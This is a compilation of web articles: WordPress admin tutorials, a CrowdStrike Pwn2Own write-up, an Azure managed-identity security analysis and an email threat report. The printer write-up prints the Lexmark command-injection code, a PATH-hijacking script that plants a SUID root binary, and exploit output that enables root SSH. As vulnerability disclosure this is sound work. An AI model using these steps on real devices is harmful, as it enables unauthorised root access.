We recommend using WP Rocket. It is the best WordPress caching plugin on the market. It works out of the box and makes it super easy to optimize your WordPress performance.

For more details, see our guide on how to properly install and setup WP Rocket in WordPress.

7. Tweak Admin Screens & Disable WordPress Dashboard Widgets

WordPress automatically loads some widgets on the dashboard screen. This includes Quick Draft, Events and News, Site Health, and more.

Some WordPress plugins add their own widgets to the dashboard screen as well. If you have a lot of these widgets loading on your dashboard, it could slow things down.

You can turn off these widgets by simply clicking on the Screen Options button and unchecking the box next to the widgets.

Screen Options to remove unnecessary widgets

Similarly, you can use the Screen Options menu to show and hide sections on different admin screens.

For instance, you can choose the columns you want to see on the posts screen.

8. Fix Slow WooCommerce Admin Dashboard

If you run an online store using WooCommerce, then there are some specific WooCommerce features that can affect the performance of your WordPress admin area.

For instance, you can turn off the WooCommerce dashboard widget by clicking on the Screen Options menu.

Similarly, you can change the information displayed on the Products page.

After a while, your WooCommerce store may add unnecessary data to your WordPress database.

If you are already using WP Rocket, then you can simply switch to the Database tab under plugin settings. From here, you can delete transients and optimize your WordPress database with a click.

9. Lock WordPress Admin Area and Login Pages

Random hackers and DDoS attacks are common internet nuisances that can affect WordPress websites.

These automated scripts access WordPress login pages and attempt to login hundreds of times in a short amount of time.

They may not be able to gain access to your WordPress website, but they would still be able to slow it down.

One easy way to block these scripts is by locking your WordPress admin directory and login pages.

If you are on Bluehost, then you can simply go to your hosting control panel and switch to the Advanced Tab. From here, you need to click on the Directory Privacy icon.

Next, you need to locate wp-admin directory (usually found inside public_html folder).

Then simply click on the Edit button next to it.

Next, you will be asked to provide a name for your protected directory.

Click on the Save button to continue. The control panel will save your options and you’ll need to click on the Go Back button to continue.

After that, you will need to create username and password for the protected folder.

Now, when you visit your WordPress admin area, you will be prompted to enter username and password.

For more details, see our tutorial on how to password protect the WordPress admin directory.

Password Protect WordPress Login Page

Next, you would want to block access to WordPress login page. For this, you’ll need to manually edit .htaccess file on your website and generate a password file.

First, connect to your WordPress website using an FTP client or the File Manager app inside your hosting control panel.

After that, go to the root folder of your website (the root folder is where you can see the wp-admin, wp-includes, and wp-content folders).

Here you need to create a new file and name it .htpasswd.

Next, you need to visit this online tool to generate a .htpasswd string.

You need to use the same username and password that you used for the WordPress admin directory.

Then click on the Generate button.

The tool will generate a username and password string under the output box.

You need to copy and paste this string inside the .htpasswd file you created earlier.

Next, you need to edit the .htaccess file and copy and paste the following code inside it.

123456789 ### BEGIN BASIC BLOCK<Files wp-login.php>AuthType BasicAuthName "Protected Folder"AuthUserFile /home/username/public_html/yourwebsite/.htpasswdRequire user jsmithSatisfy All</Files>### END BASIC BLOCK

Don’t forget to replace jsmith with your own username and change AuthUserFile value with the path to your .htpasswd file. You can find it inside the File Manager app.

You can now visit your WordPress login page to see the password protection in action.

10. Manage WordPress Autosave Intervals

The WordPress block editor comes with built-in autosave feature. It allows you to easily restore your content in case you close the editor without saving your changes.

However, if multiple users are working on your website during peak traffic, then all those autosave requests will slow down WordPress admin area.

Now autosave is a crucial feature and we don’t recommend turning it off. However, you can slow it down to reduce the performance impact.

Simply add the following line to your wp-config.php file.

1	`define(` `'AUTOSAVE_INTERVAL', 120 )`

This line simply tells WordPress to run autosave once every 2 minutes (120 seconds) instead of 1.

Reduce Heartbeat API Calls

WordPress uses something called the heartbeat API to send Ajax calls to a server without reloading a page. This allows WordPress to show other authors that a post is being edited by another user, and it enables plugin developers to show you notifications in real-time.

By default, the API pings back every 60 seconds. If multiple authors are working on your website at the same time, then these server calls can become resource-intensive.

If you are already using WP Rocket, then it will automatically reduce heartbeat API activity to pingback every 120 seconds.

Reduce Heartbeat API activity using WP Rocket

Alternately, you can also use their standalone plugin called Heartbeat Control to reduce Heartbeat API calls.

We recommend reducing them to at least 120 seconds or more.

11. Upgrade or Switch to Better WordPress Hosting

All WordPress performance issues depend on the infrastructure provided by your WordPress hosting providers.

This limits your ability to improve performance to the resources offered by your hosting provider.

The above tips will certainly help you reduce load on your WordPress server, but it may not be enough for your hosting environment.

To improve performance even more, you can move your WordPress site to a new host and sign up with a different hosting provider.

We recommend using Bluehost, as one of the top WordPress hosting companies. Their shared hosting plans come with built-in caching which improves WordPress performance.

However, as your website grows you may need to upgrade your hosting plan.

High traffic sites would benefit from moving to a managed WordPress hosting platform like WP Engine or SiteGround.

At WPBeginner, we use SiteGround to host our website.

We hope this article helped you learn how to fix a slow loading WordPress dashboard. You may also want to see our complete WordPress security handbook or see our pick of the best WordPress plugins to grow your business.

Source :
https://www.wpbeginner.com/wp-tutorials/how-to-fix-a-slow-loading-wordpress-dashboard/

How to Change the WordPress Admin Email (3 Methods)

Do you want to change the WordPress admin email for your website?

By default, WordPress uses the first email address you provide as your website’s admin email. It is also used as the email address of the first admin account.

In this article, we will show you how to easily change the WordPress admin email address.

Why and When You Need to Change The WordPress Admin Email?

Normally, beginners use their personal email address when installing WordPress. Also some WordPress hosting companies have auto-installers which automatically use your hosting account’s email address during the installation.

This email address is then used by WordPress as the website’s email address as well as the email for the first admin user account.

Your website will use this email address to send important notifications. For example, when a new user account is created, an auto-update is installed, and for comment moderation notices.

The admin user’s email address is used to recover lost password and notifications about their account.

Most website owners soon realize that they want to use a professional business email address instead of generic free email accounts. They may also want to use a different email address for site administration and the admin user.

Having said that, let’s take a look at how to easily change the WordPress admin email address.

Things to Do Before Changing Admin Email Address in WordPress

First, you need to choose the email address you want to use as your WordPress admin email address. You can use a free email service like Gmail or Yahoo. However, this does not look very professional.

Ideally, you would want to use a branded email address using your website’s domain name. For instance, info@yourbusinessname.com

For detailed instructions, see our guide on how to get a free business email address.

Secondly, you’ll need to make sure that you can receive emails from your WordPress website.

Once you change your admin email address, WordPress will send an email to verify the new email address. If you cannot receive emails from your WordPress site, then you will not be able to verify the new admin email address.

To ensure that, you need to install and activate the WP Mail SMTP plugin. For more details, see our step by step guide on how to install a WordPress plugin.

For detailed instructions, see our guide on how to set up WP Mail SMTP with any hosting company.

Now that you are all set, let’s take a look at how to change the WordPress admin email address.

Method 1. Changing WordPress Admin Email Address via Admin Area

This method is simpler and recommended for beginners. In most cases, you will be using this method to change your WordPress site email and your WordPress admin user account’s email address.

To change the WordPress website email address, go to Settings » General and change the ‘Email Address’ option.

Don’t forget to save your changes.

WordPress will now save your new admin email address. However, it will not change the admin email address until you verify the email.

Once you have verified the email address, WordPress will start sending important administration related emails to the new address.

Next, if you want to change the email address of the admin user account, then you need to visit Users » All Users page and click on the ‘Edit’ link below the user you want to change.

This will open the profile edit page for that particular user account. Simply scroll down to the email option and then change the email address.

Don’t forget to click on the ‘Update profile’ button to save your changes.

If you are currently logged in to the user account that you are changing, then WordPress will now send an email notification to the new email address.

You need to click on the link in the email to confirm the change of your email address.

Method 2. Change WordPress Admin Email without Verification (using a Plugin)

If you are unable to get the verification email to change the admin email address, then you can use this method.

It basically allows you to bypass the WordPress verification and directly change the admin email address.

First, you need to install and activate the Change Admin Email plugin. For more details, see our step by step guide on how to install a WordPress plugin.

Upon activation, you need to visit the Settings » General page. Go to the ‘Administration Email Address’ option and enter the new email address you want to use.

Change admin email address without verification

Finally, click on the ‘Save Changes’ button to store your changes.

The plugin will immediately change the admin address without verification. It will also send you a test email to the new admin email address.

Method 3. Change WordPress Admin Email via PhpMyAdmin

In this method, we will show you how to change both of these email addresses via phpMyAdmin. This method should only be used when you are unable to access the WordPress admin area.

First, you need to visit the cPanel dashboard on your hosting account. Under the database section, you need to click on the phpMyAdmin icon.

Note: Depending on your hosting company, your cPanel dashboard may look slightly different than the above screenshot. We’re using Bluehost, so that’s the screenshot of our control panel.

This will launch the phpMyAdmin app. It is a database management tool, and we will be using it to directly change the admin email address in the WordPress database.

In the phpMyAdmin window, you will see your database listed in the left column. Clicking on it will show you all the tables inside it. You need to locate the _options table and click to open it.

It will now show you the data rows inside the options table. You need to click on the ‘Edit’ button next to the row where option_name is ‘admin_email’.

phpMyAdmin will now open the row in a form where you can just go ahead and change the admin email for your site.

Don’t forget to click on the ‘Go’ button to save your changes.

You have successfully updated the email address for WordPress website email notifications.

Let’s go ahead and change the email address for the admin user account.

Click to open the _users table in phpMyAdmin window. Next, click on the edit button next to the row where user login matches the user you want to edit.

PhpMyAdmin will now open the user row in a form. You can enter the new email address in the user_email field.

Don’t forget to click on the ‘Go’ button to save your changes.

Troubleshooting

Sometimes WordPress email notifications may never reach your inbox. It is a common issue, and you might be unable to receive password reset or user confirmation emails because of this.

If you are unable to receive WordPress email notifications, then please see our guide on how to fix WordPress not sending email issue.

We hope this article helped you learn how to change the WordPress admin email. You may also want to see our ultimate guide on WordPress user role permissions, and our expert pick of the must have WordPress plugins for all websites.

Source :
https://www.wpbeginner.com/beginners-guide/how-to-change-the-wordpress-admin-email/

For the Common Good: How to Compromise a Printer in Three Simple Steps

In August 2021, ZDI announced Pwn2Own Austin 2021, a security contest focusing on phones, printers, NAS devices and smart speakers, among other things. The Pwn2Own contest encourages security researchers to demonstrate remote zero-day exploits against a list of specified devices. If successful, the researchers are rewarded with a cash prize, and the leveraged vulnerabilities are responsibly disclosed to the respective vendors so they can improve the security of their products.

After reviewing the list of devices, we decided to target the Cisco RV340 router and the Lexmark MC3224i printer, and we managed to identify several vulnerabilities in both of them. Fortunately, we were luckier than last year and were able to participate in the contest for the first time. By successfully exploiting both devices, we won $20,000 USD, which CrowdStrike donated to several charitable organizations chosen by our researchers.

In this blog post, we outline the vulnerabilities we discovered and used to compromise the Lexmark printer.

Overview

Product	Lexmark MC3224
Affected Firmware Versions (without claim for completeness)	CXLBL.075.272 (2021-07-29) CXLBL.075.281 (2021-10-14)
Fixed Firmware Version	CXLBL.076.294 (CVE-2021-44735) Note: Users must implement a workaround to address CVE-2021-44736, see Lexmark Security Alert
CVE	CVE-2021-44735 (Shell Command Injection) CVE-2021-44736 (Authentication Reset)
Root Causes	Authentication Bypass, Shell Command Injection, Insecure SUID Binary
Impact	Unauthenticated Remote Code Execution (RCE) as root
Researchers	Hanno Heinrichs, Lukas Kupczyk
Lexmark Resources	https[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44735.pdf https[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44736.pdf

Step #1: Increasing Attack Surface via Authentication Reset

Before we could start our analysis, we first had to obtain a copy of the firmware. It quickly turned out that the firmware is shipped as an .fls file in a custom binary format containing encrypted data. Luckily, a detailed writeup on the encryption scheme had been published in September 2020. While the writeup did not include code or cryptographic keys, it was elaborate enough that we were able to quickly reproduce it and write our own decrypter. With our firmware decryption tool at hand, we were finally able to peek into the firmware.

It was assumed that the printer would be in a default configuration during the contest and that the setup wizard on the printer had been completed. Thus, we expected the administrator password to be set to an unknown value. In this state, unauthenticated users can still trigger a vast amount of actions through the web interface. One of these is Sanitize all information on nonvolatile memory. It can be found under Settings -> Device -> Maintenance. There are several options to choose from when performing that action:

[x] Sanitize all information on nonvolatile memory
  (x) Start initial setup wizard
  ( ) Leave printer offline
[x] Erase all printer and network settings
[x] Erase all shortcuts and shortcut settings

[Start] [Reset]

If the checkboxes are ticked as shown, the process can be initiated through the Start button. The printer’s non-volatile memory will be cleared and a reboot is initiated. This process takes approximately two minutes. Afterward, unauthenticated users can access all functions through the web interface.

Step #2: Shell Command Injection

After resetting the nvram as outlined in the previous section, the CGI script https://target/cgi-bin/sniffcapture_post becomes accessible without authentication. It was previously discovered by browsing the decrypted firmware and is located in the directory /usr/share/web/cgi-bin.

At the beginning of the script, the supplied POST body is stored in the variable data. Afterward, several other variables such as interface, dest, path and filter are extracted and populated from that data by using sed:

read data

remove=${data/*-r*/1}
if [ "x${remove}" != "x1" ]; then
    remove=0
fi
interface=$(echo ${data} | sed -n 's|^.*-i[[:space:]]\([^[:space:]]\+\).*$|\1|p')
dest=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
path=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
method="startSniffer"
auto=0
if [ "x${dest}" = "x/dev/null" ]; then
    method="stopSniffer"
elif [ "x${dest}" = "x/usr/bin" ]; then
    auto=1
fi
filter=$(echo ${data} | sed -n 's|^.*-F[[:space:]]\+\(["]\)\(.*\)\1.*$|\2|p')
args="-i ${interface} -f ${dest}/sniff_control.pcap"

The variable filter is determined by a quoted string following the value -F specified in the POST body. As shown below, it is later embedded into the args variable in case it has been specified along with an interface:

fmt=""
args=""
if [ ${remove} -ne 0 ]; then
    fmt="${fmt}b"
    args="${args} remove 1"
fi
if [ -n "${interface}" ]; then
    fmt="${fmt}s"
    args="${args} interface ${interface}"
    if [ -n "${filter}" ]; then
        fmt="${fmt}s"
        args="${args} filter \"${filter}\""
    fi
    if [ ${auto} -ne 0 ]; then
        fmt="${fmt}b"
        args="${args} auto 1"
    else
        fmt="${fmt}s"
        args="${args} dest ${dest}"
    fi
fi
[...]

At the end of the script, the resulting args value is used in an eval statement:

[...]
resp=""
if [ -n "${fmt}" ]; then
    resp=$(eval rob call system.sniffer ${method} "{${fmt}}" ${args:1} 2>/dev/null)
    submitted=1
[...]

By controlling the filter variable, attackers are therefore able to inject further shell commands and gain access to the printer as uid=985(httpd), which is the user that the web server is executed as.

Step #3: Privilege Escalation

The printer ships a custom root-owned SUID binary called collect-selogs-wrapper:

# ls -la usr/bin/collect-selogs-wrapper
-rwsr-xr-x. 1 root root 7324 Jun 14 15:46 usr/bin/collect-selogs-wrapper

In its main() function, the effective user ID (0) is retrieved and the process’s real user ID is set to that value. Afterward, the shell script /usr/bin/collect-selogs.sh is executed:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __uid_t euid; // r0

  euid = geteuid();
  if ( setuid(euid) )
    perror("setuid");
  return execv("/usr/bin/collect-selogs.sh", (char *const *)argv);
}

Effectively, the shell script is executed as root with UID=EUID, and therefore the shell does not drop privileges. Furthermore, argv[] of the SUID binary is passed to the shell script. As the environment variables are also retained across the execv() call, an attacker is able to specify a malicious $PATH value. Any command inside the shell script that is not referenced by its absolute path can thereby be detoured by the attacker.

The first opportunity for such an attack is the invocation of systemd-cat inside sd_journal_print():

# cat usr/bin/collect-selogs.sh
#!/bin/sh
# Collects fwdebug from the current state plus the last 3 fwdebug files from
# previous auto-collections. The collected files will be archived and compressed
# to the requested output directory or to the standard output if the output
# directory is not specified.

sd_journal_print() {
    systemd-cat -t collect-selogs echo "$@"
}

sd_journal_print "Start! params: '$@'"

[...]

The /dev/shm directory can be used to prepare a malicious version of systemd-cat:

$ cat /dev/shm/systemd-cat
#!/bin/sh
mount -o remount,suid /dev/shm
cp /usr/bin/python3 /dev/shm
chmod +s /dev/shm/python3
$ chmod +x /dev/shm/systemd-cat

This script remounts /dev/shm with the suid flag so that SUID binaries can be executed from it. It then copies the system’s Python interpreter to the same directory and enables the SUID bit on it. The malicious systemd-cat copy can be executed as root by invoking the setuid collect-setlogs-wrapper binary like this:

$ PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper

The $PATH environment variable is prepended with the /dev/shm directory that hosts the malicious systemd-cat copy. After executing the command, a root-owned SUID-enabled copy of the Python interpreter is located in /dev/shm:

root@ET788C773C9E20:~# ls -la /dev/shm
drwxrwxrwt    2 root     root           100 Oct 29 09:33 .
drwxr-xr-x   13 root     root          5160 Oct 29 09:31 ..
-rwsr-sr-x    1 root     httpd         8256 Oct 29 09:33 python3
-rw-------    1 nobody   nogroup         16 Oct 29 09:31 sem.netapps.rawprint
-rwxr-xr-x    1 httpd    httpd           96 Oct 29 09:33 systemd-cat

The idea behind this technique is to establish a simple way of escalating privileges without having to exploit the initial collect_selogs_wrapper SUID again. We did not use the Bash binary for this, as the version shipped with the printer seems to ignore the -p flag when running with UID!=EUID.

Exploit

An exploit combining the three vulnerabilities to gain unauthenticated code execution as root has been implemented as a Python script. First, the exploit tries to determine whether the printer has a login password set (i.e., setup wizard has been completed) or it is password-less (i.e., authentication reset already executed earlier or setup wizard not yet completed). Depending on the result, it decides whether the non-volatile memory reset is required.

If the non-volatile memory reset is triggered, the exploit waits for the printer to finish rebooting. Afterward, it continues with the shell command injection step and escalation of privileges. The privileged access is then used to start an OpenSSH daemon on the printer. To finish, the exploit establishes an interactive SSH session with the printer and hands control over to the user. An example run of the exploit in a testing environment follows:

$ ./mc3224i_exploit.py https://10.64.23.20/ sshd
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM',        
    'LOGIN_METHODS_WITH_CREDS']
[*] Device IS password protected, auth bypass required
[*] Erasing nvram...
[+] Success! HTTP status: 200, rc=1
[*] Waiting for printer to reboot, sleeping 5 seconds...
[*] Checking status...
xxxxxxxxxxxxxxxxxxxxxxx!
[+] Reboot finished
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM']
[*] Device IS NOT password protected
[+] Authentication bypass done
[*] Attempting to escalate privileges...
[*] Executing command (root? False):
    echo -e '#!/bin/sh\\n
    mount -o remount,suid /dev/shm\\n
    cp /usr/bin/python3 /dev/shm\\nchmod +s /dev/shm/python3' >
    /dev/shm/systemd-cat; chmod +x /dev/shm/systemd-cat
[+] HTTP status: 200
[*] Executing command (root? False): PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper
[+] request timed out, that’s what we expect
[+] SUID Python interpreter should be created
[*] Attempting to enable SSH daemon...
[*] Executing command (root? True):
sed -Ee 's/(RSAAuthentication|UsePrivilegeSeparation|UseLogin)/#\\1/g'
    -e 's/AllowUsers guest/AllowUsers root guest/'
    /etc/ssh/sshd_config_perf > /tmp/sshconf;
    mkdir /var/run/sshd;
    iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT;
    nohup /usr/sbin/sshd -f /tmp/sshconf &
[+] HTTP status: 200
[+] SSH daemon should be running
[*] Trying to call ssh... ('ssh', '-i', '/tmp/tmpd2vc5a2u', 'root@10.64.23.20')
root@ET788C773C9E20:~# id
uid=0(root) gid=0(root) groups=0(root)

Summary

In this blog, we described a number of vulnerabilities that can be exploited from the local network to bypass authentication, execute arbitrary shell commands, and elevate privileges on a Lexmark MC3224i printer. The research started as an experiment after the announcement of the Pwn2Own Austin 2021. The team enjoyed the challenge, as well as participating in Pwn2Own for the first time, and we welcome your feedback. We’d also like to invite you to read about the other device we successfully targeted during Pwn2Own Austin 2021, the Cisco RV340 router.

Additional Resources

Request a free CrowdStrike Intelligence threat briefing and learn how to stop adversaries targeting your organization.
Learn how to incorporate intelligence on dangerous threat actors into your security strategy by visiting the CrowdStrike Falcon X™ product page.
Read the CrowdStrike 2022 Global Threat Report.
Learn more about the CrowdStrike Falcon^® platform by visiting the product webpage.
Test CrowdStrike next-gen AV for yourself. Start your free trial of Falcon Prevent™ today.

Source :
https://www.crowdstrike.com/blog/how-to-compromise-a-printer-in-3-simple-steps/

An Analysis of Azure Managed Identities Within Serverless Environments

We examine Azure’s Managed Identities service and its security capability in a threat model as developers’ go-to feature for managing secrets and credentials.

Authentication and authorization play crucial parts when securing resources. Authentication verifies that the service or user accessing the secured resources has provided valid credentials, while authorization makes sure that they have sufficient permissions for the request itself.

Broken Access Control is listed among the top 10 OWASP prevalent web application issues from 2017 to 2021, and we have previously written about the importance of secrets management used for authentication. This occurs when an unauthorized user can access, modify, delete, or perform actions within an application or system that is outside the set permissions or policies, malicious or unintended. Broken access control has become the number one concern in the organization’s list, and in this article, we discuss Azure’s Managed Identities service inside the cloud service provider (CSP) to tackle the said web application issue.

Managing system and user identities

Managed Identities for Azure allows users to authenticate certain services available within the CSP. This is done by providing the cloud application a token used for service authentication. We distinguish between two types of managed identities: system-assigned identities and user-assigned identities. To differentiate, system-assigned identities are restricted from one to the resource, which means that different user roles can’t be applied to the same resource. On the other hand, user-managed identities solve this problem and we can imagine them as user roles.

Figure 1. Usage of Managed Identities

For instance, we want to use an Azure storage account within a serverless application for saving our application records. For this purpose, we decided to use a system-managed identity.

This practically means:

Enable managed identities inside a serverless function
Grant serverless functions the necessary permissions for storage account access

Figure 2. Enabling managed identities in a serverless function

After that, we can start using the managed identity for authentication to the storage account. In the following sections, we will look at how the managed identities interface is technically implemented within the serverless environment and the corresponding security implications based on our recent research.

Managing identities in the serverless environment

To make it work, the serverless environment runs a special .NET application process named “dotnet TokenServiceContainer.dll.” This process listens on a localhost and port 8081 to accept HTTP requests. The endpoint for requesting a token is http://localhost:8081/msi/token, and the required parameters specifies that the API version used and resource identifier for which the service requests the token. Optionally, it uses “client_id,” which is a parameter used when a managed user identity token is requested. The request also needs a specific X-IDENTITY-HEADER, and the needed value is present inside IDENTITY_HEADER or an MSI_SECRET environmental variable.

After receiving this token request, the request is delegated to the endpoint within the CSP (another service) and provides the requested token. The endpoint is publicly available and is a part of the *.identity.azure.net subdomain based on the region of the serverless application. By design and public access to the endpoint the service requires authentication, and this is done using a X509 client certificate. This certificate is unique to the specific application ID (meaning the serverless function has a one-to-one pairing of certificate and app ID) and valid for 180 days. If the request is successful, it returns a JSON response with a bearer token valid for one day.

Figure 3. Managed identities inside serverless environments

From that perspective, the security standard is high, which is expected from a CSP service. However, there is one hidden danger and that is the certificate itself. The certificate can be leaked by leaking environmental variables.

The Managed Service Identity (MSI) certificate is part of the encrypted container context, which can be accessed inside using a URL-specified CONTAINER_START_CONTEXT_SAS_URI and decrypted using the CONTAINER_ENCRYPTION_KEY variable. Once the certificate is leaked, it can be used to obtain the token outside the scope of CSP services and successfully used for publicly available service endpoints as it would be called from the CSP service.

Threat model and scenario

Figure 4. PoC of getting token using leaked environmental variables from Managed Identity service

At this point, we should emphasize that to be able to abuse the retained token, a certain factor (or malicious actor) must first leak these environmental variables and there must be an assigned role within the requested resource, the pre-requisites being the identities enabled and the role set for the application. This means there are no default roles unless explicitly specified within the CSP settings.

However, as this example of potential compromise shows from a gap leaking environmental variables of a Linux endpoint, using environmental variables for storing sensitive information is not a valid secure approach as they are by default inherited into the child process. Considering that the information is available inside the environment itself and that the certificate contains all the information provided, the endpoint for getting the token now becomes publicly available. A threat actor can get the authentication token outside of the CSP’s service and get all the permissions as the original user.

In this example, the token provider service within the serverless environment is running under a different user. Why is the client certificate available not only for this user in the form of a file with permissions only for that user? This allows a compromised serverless function to leak it and obtain the access token from the external service. But while the unauthorized user can’t get additional privileges other than what the function has, this is enough to conduct activities inside the environment that can have a range of damaging effects. By moving a client certificate into the security boundary of token service user and setting access permissions for the token service user as read-only, we guarantee that even in case of a compromise, the client certificate could not be leaked and used outside the CSP service without additional lateral movement.

The security chain is only as strong as its weakest parts. And while CSP services are not inherently insecure, small design weaknesses put together with improper user configurations could lead to bigger, more damaging consequences. Design applications, environments, and all their related variables with security in mind. If possible, avoid using environmental variables. Following best security practices such as applying the principle of least privilege helps to mitigate the consequences of a breach.

Source :
https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/an-analysis-of-azure-managed-identities-within-serverless-environments

Trend Micro Cloud App Security Threat Report 2021

In this report, we highlight the notable email threats of 2021, including over 33.6 million high-risk email threats (representing a 101% increase from 2020’s numbers) that we’ve detected using the Trend Micro Cloud App Security platform.

Email is an integral cog in the digital transformation machine. This was especially true in 2021, when organizations found themselves trying to keep business operations afloat in the middle of a pandemic that has forever changed how people work. At a time when the workplace had already largely shifted from offices to homes, malicious actors continued to favor email as a low-effort yet high-impact attack vector to disseminate malware.

Email is not only popular among cybercriminals for its simplicity but also for its efficacy. In fact, 74.1% of the total threats blocked by Trend Micro in 2021 are email threats. Meanwhile, the 2021 Internet Crime Report by the FBI’s Internet Crime Complaint Center (IC3) states that there was “an unprecedented increase in cyberattacks and malicious cyber activity” last year, with business email compromise (BEC) being among the top incidents.

In this report, we discuss the notable email threats of 2021 based on the data that we’ve gathered using the Trend Micro™ Cloud App Security™, a security solution that supplements the preexisting security features in email and collaboration platforms.

Download our infographic

Malware detections surge as attacks become more elaborate, targeted

The Trend Micro Cloud App Security solution detected and thwarted a total of 3,315,539 total malware files in 2021. More urgently, this number represents an increase of a whopping 196% from 2020’s numbers. There were also huge spikes in both known and unknown malware detections in 2021 at 133.8% and 221%, respectively.

Cybercriminals worked overtime to attach malware in malicious emails in 2021 using advanced tactics and social engineering lures. In January, we saw how Emotet sent spam emails that used hexadecimal and octal representations of IP addresses for detection evasion in its delivery of malware such as TrickBot and Cobalt Strike.

In May last year, we reported on Panda Stealer, an information stealer that targets cryptocurrency wallets and credentials via spam emails. We also shared an update on APT-C-36 (aka Blind Eagle), an advanced persistent threat (APT) group targeting South American entities using a spam campaign that used fraudulent emails impersonating Colombia’s national directorate of taxes and customs and even fake infidelity email lures.

QAKBOT operators also resumed their spam campaign in late 2021 after an almost three-month hiatus and abused hijacked email threads to lead victims to both QAKBOT and the SquirrelWaffle malware loader.

Meanwhile, ransomware detections continued to decline in 2021, a consistent trend that we have been seeing in previous years. Last year, the Trend Micro Cloud App Security solution detected and blocked 101,215 ransomware files — a 43.4% decrease compared to 2020’s detections.

The reason behind this continuing decline is possibly two-fold: One, unlike legacy ransomware that focuses on the quantity of victims, modern ransomware focuses on waging highly targeted and planned attacks to yield bigger profits. Since today’s ransomware actors no longer abide by the spray-and-pray ransomware model, the number of attacks are no longer as massive as the number that we witnessed in ransomware’s early days. We identified the other reason in our year-end roundup report: That is, it’s possible that ransomware detections are down because our cybersecurity solutions continue to block an increasing number of ransomware affiliate tools each year, including TrickBot and BazarLoader. This could have prevented ransomware attacks from being successfully executed on victim environments.

Known, unknown, and overall credential phishing attacks rose in 2021

Based on Trend Micro Cloud App Security data, 6,299,883 credential phishing attacks were detected and blocked in 2021, which accounts for a 15.2% overall increase. Similar to last year, the number of known credential phishing attacks is greater than the unknown ones. However, this year, the percentage of increase is at a staggering 72.8%.

When comparing 2020 and 2021’s numbers, we saw an 8.4% increase in the number of detections for known credential phishing links, while a 30% growth is observed in the number of detections for unknown credential phishing links.

Abnormal Security noted the increase in overall credential phishing attacks in one 2021 report and stated that credential phishing is attributed to 73% of all advanced threats that they’ve analyzed.

We have also documented the rise in credential phishing attacks from previous years. In fact, in the first half of 2019, the Trend Micro Cloud App Security solution detected and blocked 2.4 million credential phishing attacks alone.

BEC’s small numbers bring big business losses

The Trend Micro Cloud App Security solution intercepted a total of 283,859 BEC attacks in 2021. Compared with 2020’s BEC detections, this number represents a 10.61% decrease. Interestingly, there is an 82.7% increase in this year’s BEC attacks that were detected using Writing Style DNA, while there is a 38.59% decrease in attacks that have been blocked using the antispam engine.

Overall, BEC numbers have consistently been on a downward trend since 2020. But the reduction in BEC victims doesn’t equate to a dip in cybercriminal profits. According to the FBI’s IC3, BEC accounted for US$2.4 billion in adjusted losses for both businesses and consumers in 2021. According to the same organization, BEC losses have reached over US$43 billion between June 2016 and December 2021 for both domestic and international incidents.

We have also observed how BEC actors continuously tweak their tactics for ill gain. In August last year, our telemetry showed a gradual increase in BEC detections. Upon investigation, we discovered that instead of impersonating company executives and upper management personnel, this BEC-related email campaign impersonated and targeted ordinary employees for money transfers and bank payroll account changes.

Covid-19 lures, cybercriminal campaigns behind massive jump in phishing numbers

The Trend Micro Cloud App Security solution data shows that a total of 16,451,166 phishing attacks were detected and blocked in 2021. This is a 137.6% growth from 2020’s phishing numbers.

In contrast to last year’s numbers, we saw a significant jump in phishing attacks detected via spam count this year — a whopping 596% increase, to be specific. Meanwhile, we observed a notable 15.26% increase in credential phishing count compared to last year.

These high numbers reflect organizations’ sentiments about phishing attacks. According to a survey in an Osterman Research report titled “How to Reduce the Risk of Phishing and Ransomware,” organizations were “concerned” or “extremely concerned” about phishing attempts making their way to end users and employees failing to spot phishing and social engineering attacks before accessing a link or attachment.

While they kicked off majority of Covid-19-related phishing emails and sites in 2020, cybercriminals still exploited the global pandemic for financial gain. Last year, Mexico-based medical laboratory El Chopo shared that a fraudulent website that looked identical to the company’s had been launched. On that website, users could schedule a vaccination appointment after paying MXN2,700 (approximately US$130). To make the fake website appear credible, the malicious actors behind it added fake contact information such as email addresses and social media pages that victims can use for inquiries.

Early last year, we reported on a wave of phishing emails that pretended to be coming from national postal systems. This campaign attempted to steal credit card numbers from 26 countries. We also investigated a spear-phishing campaign that used Pegasus spyware-related emails to lead victims into downloading a file stealer. This campaign targeted high-ranking political leaders, activists, and journalists in 11 countries.

Protect emails, endpoints, and cloud-based services and apps from attacks with Trend Micro Cloud App Security

Organizations should consider a comprehensive multilayered security solution such as Trend Micro Cloud App Security. It supplements the preexisting security features in email and collaboration platforms like Microsoft 365 and Google Workspace (formerly known as G Suite) by using machine learning (ML) to analyze and detect any suspicious content in the message body and attachments of an email. It also acts as a second layer of protection after emails and files have passed through Microsoft 365 or Gmail’s built-in security.

Trend Micro Cloud App Security uses technologies such as sandbox malware analysis, document exploit detection, and file, email, and web reputation technologies to detect malware hidden in Microsoft 365 or PDF documents. It provides data loss prevention (DLP) and advanced malware protection for Box, Dropbox, Google Drive, SharePoint Online, OneDrive for Business, and Salesforce while also enabling consistent DLP policies across multiple cloud-based applications. It also offers seamless integration with an organization’s existing cloud setup, preserving full user and administrator functionality, providing direct cloud-to-cloud integration through vendor APIs, and minimizing the need for additional resources by assessing threat risks before sandbox malware analysis.

Trend Micro Cloud App Security stands on the cutting edge of email and software-as-a-service (SaaS) security, offering ML-powered features that combat two of the primary email-based threats: BEC and credential phishing. Writing Style DNA can help determine if an email is legitimate by using ML to check a user’s writing style based on past emails and then comparing suspicious emails against it. Computer vision, on the other hand, combines image analysis and ML to check branded elements, login forms, and other site content. It then pools this information with site reputation elements and optical character recognition (OCR) to check for fake and malicious sites — all while reducing instances of false positives to detect credential phishing email.

This security solution also comes with an option to rescan historical URLs in users’ email metadata and perform continued remediation (automatically taking configured actions or restoring quarantined messages) using newer patterns updated by Web Reputation Services.

